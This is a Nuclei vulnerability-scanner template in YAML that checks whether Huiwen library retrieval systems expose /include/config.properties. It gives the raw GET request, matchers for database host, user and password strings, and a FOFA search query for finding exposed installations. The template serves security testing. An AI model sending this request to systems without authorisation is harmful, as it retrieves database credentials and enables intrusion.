nuclei-templates/http/vulnerabilities/other/huiwen-bibliographic-info-l...

34 lines
839 B
YAML
Executable File

id: huiwen-bibliographic-info-leak
info:
name: Huiwen library bibliographic Retrieval System - Information Exposure
author: SleepingBag945
severity: high
description: |
Huiwen library bibliographic retrieval system /include/config.properties file contains sensitive information, attackers can directly access to obtain information
metadata:
max-request: 1
fofa-query: app="汇文软件-书目检索系统"
verified: true
tags: huiwen,exposure,misconfig
http:
- raw:
- |
GET /include/config.properties HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "host="
- "port="
- "user="
- "password="
part: body
condition: and
- type: status
status:
- 200